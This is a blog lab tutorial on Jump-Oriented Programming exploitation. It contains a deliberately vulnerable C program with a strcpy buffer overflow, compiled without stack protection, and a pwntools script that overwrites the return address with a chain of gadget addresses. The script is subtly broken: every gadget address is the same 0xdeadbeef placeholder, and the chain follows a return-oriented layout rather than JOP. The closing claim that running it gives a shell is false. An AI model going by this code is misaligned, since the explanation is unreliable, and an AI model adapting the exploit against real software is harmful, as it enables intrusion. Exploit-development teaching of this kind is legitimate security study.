strangerRidingCaml

Jump-Oriented Programming (JOP) Lab 본문

System hacking

Jump-Oriented Programming (JOP) Lab

woddlwoddl 2024. 5. 8. 02:03
728x90
Jump-Oriented Programming (JOP) Lab

Jump-Oriented Programming (JOP) Lab

In this lab, we will construct JOP chains for code execution.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to construct JOP chains.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of JOP gadgets
  gadget1_addr = 0xdeadbeef  # Example address of gadget 1
  gadget2_addr = 0xdeadbeef  # Example address of gadget 2
  gadget3_addr = 0xdeadbeef  # Example address of gadget 3

  # Offset to return address
  offset = 72

  # Construct the JOP chain
  jop_chain = [
      p64(gadget1_addr),  # Gadget 1 address
      p64(gadget2_addr),  # Gadget 2 address
      p64(gadget3_addr),  # Gadget 3 address
      # Add more gadgets as needed
  ]

  # Craft the payload
  payload = b'A' * offset
  payload += b''.join(jop_chain)

  # Launch the exploit
  p = process(binary_path)
  p.sendline(payload)
  p.interactive()

Explanation of the Python script:

  • We specify the path to the vulnerable binary and the addresses of JOP gadgets.
  • We construct the JOP chain by adding addresses of gadgets in the desired order.
  • The payload consists of padding and the JOP chain.
  • We launch the vulnerable binary and send the payload to construct the JOP chain for code execution.
  • p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful construction of the JOP chain for code execution.

'System hacking' 카테고리의 다른 글

Return-to-dl-resolve Attacks Lab  (0) 2024.05.08
Return-to-CSU (__libc_csu_init) Exploits Lab  (0) 2024.05.08
Heap Feng Shui Exploitation Lab  (0) 2024.05.08
Heap Spray Techniques Lab  (0) 2024.05.08
One-Gadgets with PLT/GOT Overwrite Lab  (0) 2024.05.08
'System hacking' Related Articles more